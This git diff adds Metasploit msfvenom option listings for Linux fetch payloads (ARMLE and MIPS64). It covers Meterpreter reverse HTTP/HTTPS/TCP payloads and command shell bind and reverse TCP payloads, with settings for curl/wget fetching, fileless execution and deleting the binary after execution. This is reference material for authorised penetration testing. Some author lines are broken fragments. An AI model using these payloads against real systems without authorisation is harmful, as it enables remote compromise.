@@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/armle/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/armle/meterpreter_reverse_https: +========================= + +k@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME yVuhXdmh no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + 
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..fdb3beb --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/armle/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/armle/meterpreter_reverse_tcp: +========================= + +_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME MbCCNJBUC no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + 
MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armle-shell-bind_tcp.txt new file mode 100644 index 0000000..ed0ef24 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-shell-bind_tcp.txt 
@@ -0,0 +1,90 @@ + + Name: HTTPS Fetch, Linux dup2 Command Shell, Bind TCP Stager + Module: payload/cmd/linux/https/armle/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + nemo + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ySPizMEJvcst no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + dup2 socket in r12, then execve. + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no 
A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armle-shell-reverse_tcp.txt new file mode 100644 index 0000000..470f15c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-shell-reverse_tcp.txt 
@@ -0,0 +1,98 @@ + + Name: HTTPS Fetch, Linux dup2 Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/https/armle/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + nemo + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME FmcwCXPI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + dup2 socket in r12, then execve. + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no 
A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armle-shell_bind_tcp.txt new file mode 100644 index 0000000..0e19d07 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-shell_bind_tcp.txt 
@@ -0,0 +1,81 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/https/armle/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + civ + hal + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ARGV0 sh no argv[0] to pass to execve +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME BfDJWpoeNTIJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + Connect to target and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + 
VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armle-shell_reverse_tcp.txt new file mode 100644 index 0000000..645aeab --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-shell_reverse_tcp.txt 
@@ -0,0 +1,87 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/https/armle/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + civ + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ARGV0 sh no argv[0] to pass to execve +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME TQHUGlZxwFFG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + 
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..579fb11 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_http.txt 
@@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mips64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/mips64/meterpreter_reverse_http: +========================= + +k@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME svCIEhTaT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPS64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom 